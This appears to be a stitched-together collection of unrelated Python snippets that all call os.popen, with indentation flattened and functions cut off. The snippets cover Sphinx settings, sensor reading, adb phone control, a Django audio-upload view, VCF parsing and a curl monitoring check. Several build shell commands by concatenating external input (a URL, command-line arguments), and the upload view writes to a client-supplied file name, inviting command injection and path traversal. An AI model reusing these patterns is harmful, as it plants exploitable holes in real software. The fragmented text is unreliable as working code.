# How to display URL addresses: 'footnote', 'no', or 'inline'. # texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. # texinfo_no_detailmenu = False # -- Options for PDF output -------------------------------------------------- pdf_documents = [ (master_doc, target_name, title, author) ] # Used for the developer documentation latest_tag = os.popen('git describe --abbrev=0 --tags').read().strip('\n') # Used for the upgrade documentation previous_release_branch_name = 'pike' current_release_branch_name = 'queens' # dev docs have no branch specified on master; for stable braches it's "/branch/" watermark = os.popen("git branch --contains $(git rev-parse HEAD) | awk -F/ '/stable/ {print $2}'").read().strip(' \n\t').capitalize() if watermark == "": watermark = "Pre-release" deploy_branch_link_name = "latest" dev_branch_link_name = "" current_release_git_branch_name = "master" current_release_gnocchi_git_branch_name = "master" else: deploy_branch_link_name = current_release_branch_name
import os, time f = os.popen('ls -l') records = f.readlines() for record in records: print record time.sleep(1)
def init_update(self): """ Read the latest Temperature reading. Reading for temperature might be different between systems Support for additional systems can be added here """ def empty_func(): """ emptly func just returns None, in case no valid update was availale """ return None def update_max_temp(last_value): try: if int(last_value) > int(self.max_temp): self.max_temp = last_value except (ValueError, TypeError): # Not 0 to avoid problems with graph creation self.max_temp = 1 def set_threshold(sensor, idx): try: sample = psutil.sensors_temperatures() self.temp_thresh = sample[sensor][0].high logging.debug("Temperature threshold set to " + str(self.temp_thresh)) except(ValueError, TypeError): self.temp_thresh = self.THRESHOLD_TEMP def update_func(sensor, idx): sample = psutil.sensors_temperatures() last_value = sample[sensor][idx].current update_max_temp(last_value) self.last_temp = last_value Source.update(self) logging.debug("custom temp is " + str(self.custom_temp)) # Use the manual sensor if self.custom_temp is not None: logging.debug("Selected custom temp") try: sensors_info = self.custom_temp.split(",") sensor_major = sensors_info[0] sensor_minor = sensors_info[1] logging.debug("Major " + str(sensor_major) + " Minor " + str(sensor_minor)) def update(): update_func(sensor_major, int(sensor_minor)) set_threshold(sensor_major, int(sensor_minor)) return update except (KeyError, IndexError, AttributeError): self.is_available = False logging.debug("Illegal sensor") return empty_func # Select from possible known sensors try: sensors = psutil.sensors_temperatures() sensor = None if 'coretemp' in sensors: sensor = 'coretemp' elif 'k10temp' in sensors: sensor = 'k10temp' elif 'it8655' in sensors: sensor = 0 elif 'it8622' in sensors: sensor = 'it8622' elif 'it8721' in sensors: sensor = 'it8721' elif 'bcm2835_thermal' in sensors: sensor = 'bcm2835_thermal' else: # Fallback to first in list try: chips = list(sensors.keys()) sensor = chips[0] logging.debug("Fallback: setting temp sensor " + str(sensor)) except (KeyError, IndexError): pass if sensor is not None: logging.debug("Temperature sensor is set to " + str(sensor)) set_threshold(sensor, 0) def update(): update_func(sensor, 0) return update # If sensors was not found using psutil, try reading file else: logging.debug("Unable to set sensors with psutil") try: thermal_file = '/sys/class/thermal/thermal_zone0/temp' cmd = 'cat ' + thermal_file + ' 2> /dev/null' os.popen(cmd).read() def update(): with os.popen(cmd) as temp_file: last_value = temp_file.read() logging.info("Recorded temp " + last_value) try: last_value = int(last_value) / 1000 except(ValueError): logging.debug("Thermal zone contains no data") self.is_available = False return empty_func update_max_temp(last_value) self.last_temp = last_value Source.update(self) self.temp_thresh = self.THRESHOLD_TEMP logging.debug("Used thermal zone as file") return update except (KeyError): self.is_available = False return empty_func except(AttributeError): self.is_available = False return empty_func
if len(words) == 2: f, g = words[0].strip(), words[1].strip() if f == 'samples': samples = g if f == 'lines': lines = g if f == 'bands': bands = g return samples, lines, bands def md(d): # make folder if not yet exist if not os.path.exists(d): os.mkdir(d) exe = "/home/" + \ os.popen("whoami").read().strip() + \ "/GitHub/bcws-psu-research/cpp/convert_iq_to_s2.exe" exe = os.path.abspath(exe) print(exe) data_folder = args[1] if len(args) > 1 else os.path.abspath( os.getcwd()) + os.path.sep if not os.path.exists(exe): print("Error: failed to find convert_iq_to_s2.exe") sys.exit(1) cmd = "ls -1d " + os.path.abspath(data_folder) + os.path.sep + "*_SLC" files = [f.strip() for f in os.popen(cmd).readlines()] folders = [f + '/' for f in files]
def copy(name: str, index: int = 0): cmd = dn_console + 'copy --name %s --from %d' % (name, index) process = os.popen(cmd) result = process.read() process.close() return result
def upload(request): # print(request.POST) file_name = os.path.join('robot_app', 'static', 'audio_file', request.POST['name']) file = request.FILES['file'] with open(file_name, 'wb') as f: f.write(file.read()) text = audio2text(file_name) if text[0:2] == '搜索' or text[0:2] == '发送' or text[0:2] == '播放': index = get_high_sim(text[0:2]) else: index = get_high_sim(text) if index is not None: answer = read_answer(index) if index == 4: os.popen('notepad') if index == 3: os.popen('G:\QQ\Bin\QQScLauncher.exe') time.sleep(5) win32api.keybd_event(13, 0, 0, 0) # enter键位码是86 win32api.keybd_event(13, 0, win32con.KEYEVENTF_KEYUP, 0) if index == 5: driver = webdriver.Chrome() # 利用浏览器 driver.get("http://www.baidu.com") # 打开get到的网址 time.sleep(3) # t停顿3秒,即3秒内一直在这个界面 # print("网站的名称:",driver.title) # 获取网站名称并输出 #打开keyword.txt文件,并一行行读取数据:keyword.txt中可以存放任意关键字,比如:selenium python 赵丽颖(ps:一个关键字占一行) driver.find_element('id', 'kw').send_keys(text[2:]) # 通过输入框的id为kw,定位到输入框,输入”selenium” driver.find_element('id', 'su').click() # 通过搜索按钮的id为su定位到搜索按钮,点击按钮 # time.sleep(5) # 停顿5秒 if index == 6: picture_time = time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime(time.time())) directory_time = time.strftime("%Y-%m-%d", time.localtime(time.time())) print(picture_time) print(directory_time) # 打印文件目录 print(os.getcwd()) # 获取到当前文件的目录,并检查是否有 directory_time 文件夹,如果不存在则自动新建 directory_time 文件 try: File_Path = os.getcwd() + '\\' + directory_time + '\\' if not os.path.exists(File_Path): os.makedirs(File_Path) print("目录新建成功:%s" % File_Path) else: print("目录已存在!!!") except BaseException as msg: print("新建目录失败:%s" % msg) driver = webdriver.Chrome() driver.get("https://baidu.com/") try: url = driver.save_screenshot('.\\' + directory_time + '\\' + picture_time + '.png') print("%s :截图成功!!!" % url) except BaseException as pic_msg: print("截图失败:%s" % pic_msg) time.sleep(2) driver.quit() if index == 7: os.popen('G:\CloudMusic\cloudmusic.exe') time.sleep(8) start() if index == 8: x=text.index('给') int(x) to_who=text[x+1:] msg=text[2:x] qq(to_who) send_qq(to_who,msg) if index == 9: stop() if index == 10: last() if index == 11: next() if index == 12: turn_up() if index == 13: turn_down() if index == 14: love() if index == 15: show_words() if index == 16: shoutsown_words() if index == 17: os.system(r'taskkill /f /t /im cloudmusic.exe') if index == 18: start() if index == 19: music=text[2:] find_music() time.sleep(1) play_music(music) else: answer = get_roboot_answer(text) con[text]=answer hecheng_name = os.path.join('robot_app', 'static', 'audio_file', 'hecheng' + request.POST['name']) if text2audio(answer, hecheng_name): print('合成成功!') res_name = hecheng_name.strip('robot_app//') else: print('合成失败!') res_name = '' res_str = { 'play_tpe': 'talk', 'res_name': res_name, 'content': answer } return HttpResponse(json.dumps(res_str), content_type='application/json')
def main ( argv ) : qFaLen = LoadFaLen( argv[1] ) figPrefix = 'test' if len(argv) > 2 : figPrefix = argv[2] if argv[0][-3:] == '.gz' : I = os.popen( 'gzip -dc %s' % argv[0] ) else : I = open ( argv[0] ) data, distance, leftIdn, rightIdn, aveIdn, nr, aa, bb = [],{},{},{},{},{},{},{} s = set() print '#Chr\tPosition\tDistance\tLeftIden\tRightIden\tAveIden\tN-Ratio\tAA' while 1 : # VCF format lines = I.readlines( 100000 ) if not lines : break for line in lines : if re.search(r'^#', line) : continue col = line.strip('\n').split() key = col[0] + ':' + col[1] if key in s : continue s.add(key) #if re.search(r'^PASS', col[6] ) : continue if not re.search(r'^PASS', col[6] ) : continue #if svsize < 500 : continue mage = re.search(r';?AGE=([^;]+)' , col[7]) if mage : age = mage.group(1).split(':') else : age = ['0','0','0','0','0','0','0'] fmat = { k:i for i,k in enumerate( col[8].split(':') ) } if 'VS' not in fmat or 'QR' not in fmat: continue idx = 9 if col[idx].split(':')[fmat['QR']] == '.': continue for type in ['AA', 'QR', 'VS'] : if type not in fmat : print >> sys.stderr, '# [ERROR] The "Format" fields did not contian %s in VCF %s' %( 'AA', argv[0] ) sys.exit(1) svsize = string.atoi( col[idx].split(':')[fmat['VS']] ) qId = col[idx].split(':')[fmat['QR']].split(',')[-1].split('-')[0] qSta = string.atof(col[idx].split(':')[fmat['QR']].split(',')[-1].split('-')[1]) qEnd = string.atof(col[idx].split(':')[fmat['QR']].split(',')[-1].split('-')[2]) if qId not in qFaLen : print >> sys.stderr, '#[ERROR]', qId, 'is not been found in file', argv[1], '\n' sys.exit(1) qSta= int( qSta * 100 / qFaLen[qId] + 0.5 ) qEnd= int( qEnd * 100 / qFaLen[qId] + 0.5 ) if qSta > 100 or qEnd > 100 : print >> sys.stderr, '#[ERROR] Query size Overflow!', col[7] sys.exit(1) leg = min(qSta, 100 - qEnd) #if 100 - qEnd < qSta : leg = qEnd leftIden, rightIden = string.atoi(age[2]), string.atoi(age[4]) avelen , aveIden = string.atoi(age[5]), string.atoi(age[6]) nn = re.search(r';?NR=([^;]+)' , col[7]) n = int(1000 * string.atof(nn.group(1)) + 0.5) / 10.0 if len( col[idx].split(':')[fmat['AA']].split(',') ) < 4 : print >> sys.stderr, col[0], col[1], fmat['AA'], col[idx].split(':')[fmat['AA']], col[idx] continue alt = string.atoi( col[idx].split(':')[fmat['AA']].split(',')[1] ) # Alternate perfect bot = string.atoi( col[idx].split(':')[fmat['AA']].split(',')[3] ) # Both imperfect if leg not in distance : distance[leg] = [0,0] if leftIden not in leftIdn : leftIdn[leftIden] = [0,0] if rightIden not in rightIdn : rightIdn[rightIden] = [0,0] if aveIden not in aveIdn : aveIdn[aveIden] = [0,0] if n not in nr : nr[n] = [0,0] if alt not in aa : aa[alt] = [0,0] if bot not in bb : bb[bot] = [0,0] distance[leg][0] += 1 leftIdn[leftIden][0] += 1 rightIdn[rightIden][0] += 1 aveIdn[aveIden][0] += 1 nr[n][0] += 1 aa[alt][0] += 1 bb[bot][0] += 1 data.append([leg, alt, leftIden, rightIden, aveIden, n, bot]) print col[0], '\t', col[1], '\t', leg, '\t', leftIden, '\t', rightIden, '\t', aveIden, '\t', n, '\t', alt, '\t', bot, '\t',svsize,qId, qFaLen[qId] I.close() data = np.array(data) print >> sys.stderr, '\nPosition\tALTernatePerfect\tLeftIdentity\tRightIdentity\tAveIden\tNRatio\tBothImperfect' print >> sys.stderr, 'Means: ', data.mean(axis=0), '\nstd : ', data.std(axis=0), '\nMedian: ', np.median( data, axis=0 ) print >> sys.stderr, '25 Percentile:', np.percentile(data, 25,axis=0), '\n50 Percentile:', np.percentile(data, 50,axis=0), '\n75 Percentile:', np.percentile(data, 75,axis=0) DrawFig( figPrefix, \ np.array (Accum( distance )), \ np.array (Accum( leftIdn )), \ np.array (Accum( rightIdn )), \ np.array (Accum( aveIdn )), \ np.array (Accum( nr, True )), \ np.array (Accum( aa )), \ np.array (Accum( bb )), \ np.array ( data ) )
#! /usr/bin/env python
def get_text(url): """Textual version of url""" import os return str(os.popen(f'w3m -O utf8 -cols 10000 -dump "{url}"').read())
import os os.system('\cp LoopFind.cpp ~/llvm/llvm/tools/clang/tools/extra/loop-find/') os.system('ninja loop-find') a = os.popen('ls all_tests/').readlines() command = './bin/loop-find all_tests/' for b in a: cmd = command + b[0:-1] os.system(cmd + ' >> result.txt')
def get_fps(self): device=self.get_mdevice() package=self.get_packagename() activity=self.get_activityname() androidversion=self.get_androidversion() command="" if androidversion<7: command=adb+ " -s {} shell dumpsys SurfaceFlinger --latency 'SurfaceView'".format(device) elif androidversion==7: command=adb+ " -s {} shell \"dumpsys SurfaceFlinger --latency 'SurfaceView - {}/{}'\"".format(device,package,activity) elif androidversion>7: command = adb + " -s {} shell \"dumpsys SurfaceFlinger --latency 'SurfaceView - {}/{}#0'\"".format(device, package, activity) print(command) results=os.popen(command) if not results: print("nothing") return (None, None) #print(device,results.read()) timestamps = [] #定义纳秒 nanoseconds_per_second = 1e9 #定义刷新间隔 refresh_period = 16666666 / nanoseconds_per_second #定义挂起时间戳 pending_fence_timestamp = (1 << 63) - 1 #遍历结果集 for line in results: #去空格并分列 line = line.strip() list = line.split("\t") #剔除非数据列 if len(list) != 3: continue #取中间一列数据 timestamp = float(list[1]) # 当时间戳等于挂起时间戳时,舍弃 if timestamp == pending_fence_timestamp: continue timestamp /= nanoseconds_per_second #安卓7的adbdump提供255行数据,127行0以及128行真实数据,所以需要将0行剔除 if timestamp!=0: timestamps.append(timestamp) #获得总帧数 frame_count = len(timestamps) #获取帧列表总长、规范化帧列表总长 frame_lengths, normalized_frame_lengths = self.GetNormalizedDeltas(timestamps, refresh_period, 0.5) if len(frame_lengths) < frame_count - 1: print('Skipping frame lengths that are too short.') frame_count = len(frame_lengths) + 1 #数据不足时,返回None if not refresh_period or not len(timestamps) >= 3 or len(frame_lengths) == 0: print("未收集到有效数据") return "N/a", "N/a" #总秒数为时间戳序列最后一位减第一位 seconds = timestamps[-1] - timestamps[0] fps = int(round((frame_count - 1) / seconds)) #这部分计算掉帧率。思路是先将序列化过的帧列表重新序列化,由于min_normalized_delta此时为None,故直接求出frame_lengths数组中各个元素的差值保存到数组deltas中。 length_changes, normalized_changes = self.GetNormalizedDeltas(frame_lengths, refresh_period) #求出normalized_changes数组中比0大的数,这部分就是掉帧。 jankiness = [max(0, round(change)) for change in normalized_changes] pause_threshold = 20 #normalized_changes数组中大于0小于20的总和记为jank_count。这块算法是看明白了,但思路get不到。。。 jank_count = sum(1 for change in jankiness if change > 0 and change < pause_threshold) return fps, jank_count
def _GetDependentFiles(self, path): """Return the file's dependencies using platform-specific tools (the imagehlp library on Windows, otool on Mac OS X and ldd on Linux); limit this list by the exclusion lists as needed""" dirname = os.path.dirname(path) dependentFiles = self.dependentFiles.get(path) if dependentFiles is None: if sys.platform == "win32": origPath = os.environ["PATH"] os.environ["PATH"] = origPath + os.pathsep + \ os.pathsep.join(sys.path) import cx_Freeze.util try: dependentFiles = cx_Freeze.util.GetDependentFiles(path) except cx_Freeze.util.BindError: # Sometimes this gets called when path is not actually a library # See issue 88 dependentFiles = [] os.environ["PATH"] = origPath else: dependentFiles = [] if sys.platform == "darwin": command = 'otool -L "%s"' % path splitString = " (compatibility" dependentFileIndex = 0 else: command = 'ldd "%s"' % path splitString = " => " dependentFileIndex = 1 for line in os.popen(command): parts = line.expandtabs().strip().split(splitString) if len(parts) != 2: continue dependentFile = parts[dependentFileIndex].strip() if dependentFile == os.path.basename(path): continue if dependentFile in ("not found", "(file not found)"): fileName = parts[0] if fileName not in self.linkerWarnings: self.linkerWarnings[fileName] = None message = "WARNING: cannot find %s\n" % fileName sys.stdout.write(message) continue if dependentFile.startswith("("): continue pos = dependentFile.find(" (") if pos >= 0: dependentFile = dependentFile[:pos].strip() if dependentFile: dependentFiles.append(dependentFile) if sys.platform == "darwin": # Make library paths absolute. This is needed to use # cx_Freeze on OSX in e.g. a conda-based distribution. # Note that with @rpath we just assume Python's lib dir, # which should work in most cases. dependentFiles = [p.replace('@loader_path', dirname) for p in dependentFiles] dependentFiles = [p.replace('@rpath', sys.prefix + '/lib') for p in dependentFiles] dependentFiles = self.dependentFiles[path] = \ [self._CheckDependentFile(f, dirname) \ for f in dependentFiles if self._ShouldCopyFile(f)] return dependentFiles
try: args = sys.argv if( len(sys.argv) > 1): MAXTIME_WARNING = int(args[1]) if( len(sys.argv) > 2): MAXTIME_CRITICAL = int(args[2]) if( len(sys.argv) > 3): CERT = str(args[3]) if( len(sys.argv) > 4): API_URL = str(args[4]) except Exception as e: print('Falha ao ler ou setar parametros: '+ str(e)) exit(4) COMANDO_PENDENCIAS = 'curl -s -S --cert ' + CERT + ' ' + API_URL # buscar as pendencias try: strPends = os.popen(COMANDO_PENDENCIAS).read() tmp = json.loads(strPends) except Exception as e: print('Falha ao ler ou abrir a lista de pendencias do barramento. ' + str(e)) print('Verifique se o certificado eh aceito pelo barrramento. Rode o seguinte comando e ') print('certifique-se que retorne um json valido: ' + COMANDO_PENDENCIAS) exit(4) # transformar pendencias em um json plano (cada elemento um idt unico) jsoPends = {} for t in tmp: j = { str(t['IDT']): { "status": t['status'] }
def season(config): """ This moves files in a directory into a seasonal directory in the same path: Grand Blue/{files} --> Grand Blue/Season 1/{files} Commands: 1. Move all {files} to the same path, but with parent dir path added with - temp 2. Move all {files} from temp to path/{Season}, and remove the temp path. """ # This command only works with Premiered shows. try: path = input("Please enter the path of the show, with Premiered as root: ") new_season = input("Please input the season folder name: ") except: print("Exiting...") sys.exit(1) # For each path, update it for r in config.getList(): print("Now working on %s%s%s (%s%s%s)" % (Colors.WARNING, r[0], Colors.ENDC, Colors.OKBLUE, r[2], Colors.ENDC )) # Check if the path exists. res = os.popen(LIST % (r[0], r[2], path)).read() res = json.loads(res) # If the folder doesn't exist, skip it. if len(res) == 0: print("%sNOTICE%s: Path under %s%s/%s/%s%s does not exist, skipping..." % (Colors.WARNING, Colors.ENDC, Colors.FAIL, r[0], r[2], path, Colors.ENDC)) continue # Move the files first to a temporary directory, append " - temp" to parent path if path.endswith("/"): path = path[:-1] # Splice the last "/" out temp_path = path + " - temp" # Make the temp dir and move print("%sNOTICE%s: Making temporary directory: %s%s/%s/%s%s..." % (Colors.WARNING, Colors.ENDC, Colors.FAIL, r[0], r[2], temp_path, Colors.ENDC), end=" ") sys.stdout.flush() os.system(MKDIR % (r[0], r[2], temp_path)) print("Done") print("%sNOTICE:%s Moving files to temporary directory..." % (Colors.WARNING, Colors.ENDC), end=" ") sys.stdout.flush() os.system(MOVE1 % (r[0], r[2], path, r[0], r[2], temp_path)) print("Done") new_path = path + "/" + new_season print("%sNOTICE%s: Moving files to %s%s/%s/%s%s..." % (Colors.WARNING, Colors.ENDC, Colors.FAIL, r[0], r[2], new_path, Colors.ENDC), end=" ") sys.stdout.flush() os.system(MOVE2 % (r[0], r[2], temp_path, r[0], r[2], new_path)) print("Done")
def phone_back(): '''手机返回''' os.popen('adb -s QMFDU20630010700 shell input keyevent 4')
def get_androidversion(self): command=adb+" -s {} shell getprop ro.build.version.release".format(self.get_mdevice()) version=os.popen(command).read()[0] return int(version)
def phone_click(x, y): '''手机点击屏幕''' my_string = 'adb -s QMFDU20630010700 shell input tap ' + str( x) + ' ' + str(y) os.popen(my_string)
def phone_home(): '''按下手机的home按键''' os.popen('adb -s QMFDU20630010700 shell input keyevent 3', 'r', 1)
def get_git_date(file_path): r = os.popen(CMD_GIT_DATE % file_path) for l in r: # Result is one line, so just return return l.replace("\n", "") return ""
def phone_swipe(x1, y1, x2, y2): '''手机滑动''' os.popen('adb -s QMFDU20630010700 shell input swipe ' + str(x1) + ' ' + str(y1) + ' ' + str(x2) + ' ' + str(y2))